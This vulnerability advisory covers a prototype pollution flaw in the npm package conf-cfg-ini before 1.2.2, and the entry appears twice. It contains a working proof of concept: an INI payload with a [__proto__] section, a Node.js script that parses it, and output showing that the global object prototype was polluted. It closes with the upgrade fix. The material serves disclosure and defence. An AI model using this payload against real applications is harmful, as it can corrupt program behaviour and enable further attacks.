Vulnerability	Vulnerable Version
H Prototype Pollution conf-cfg-ini is an encode and decode ini,conf,cfg files Affected versions of this package are vulnerable to Prototype Pollution. If an attacker submits a malicious INI file to an application that parses it with `decode`, they will pollute the prototype on the application. This can be exploited further depending on the context. ##PoC by Eugene Lim: payload.ini `[__proto__] polluted=polluted` poc.js: `var fs = require('fs') var Config = require('conf-cfg-ini') var config = new Config(); config.options.lineEnding = config.detectLineEnding(fs.readFileSync('./payload.ini', 'utf-8')); var parsed = config.decode(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.__proto__) console.log({}.__proto__) console.log(polluted)` `> node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted` How to fix Prototype Pollution? Upgrade `conf-cfg-ini` to version 1.2.2 or higher.	<1.2.2

Prototype Pollution

conf-cfg-ini is an encode and decode ini,conf,cfg files

Affected versions of this package are vulnerable to Prototype Pollution. If an attacker submits a malicious INI file to an application that parses it with decode, they will pollute the prototype on the application. This can be exploited further depending on the context.

##PoC by Eugene Lim:

payload.ini

[__proto__]
polluted=polluted

poc.js:

var fs = require('fs')
var Config = require('conf-cfg-ini')

var config = new Config();
config.options.lineEnding = config.detectLineEnding(fs.readFileSync('./payload.ini', 'utf-8'));
var parsed = config.decode(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log({}.__proto__)
console.log(polluted)

> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted

How to fix Prototype Pollution?

Upgrade conf-cfg-ini to version 1.2.2 or higher.

<1.2.2

Go back to all versions of this package